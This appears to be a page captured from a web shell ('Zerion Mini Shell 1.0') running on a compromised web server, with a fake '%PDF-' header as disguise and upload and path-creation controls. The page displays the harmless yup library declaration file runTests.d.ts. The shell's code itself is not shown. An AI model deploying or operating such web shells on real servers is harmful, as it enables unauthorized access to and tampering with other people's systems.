%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/html/node_modules/yup/lib/util/
Upload File :
Create Path :
Current File : /var/www/html/node_modules/yup/lib/util/runTests.d.ts

import ValidationError from '../ValidationError';
import { TestOptions } from './createValidation';
import { Callback } from '../types';
export declare type RunTest = (opts: TestOptions, cb: Callback) => void;
export declare type TestRunOptions = {
    endEarly?: boolean;
    tests: RunTest[];
    args?: TestOptions;
    errors?: ValidationError[];
    sort?: (a: ValidationError, b: ValidationError) => number;
    path?: string;
    value: any;
    sync?: boolean;
};
export default function runTests(options: TestRunOptions, cb: Callback): void;

Zerion Mini Shell 1.0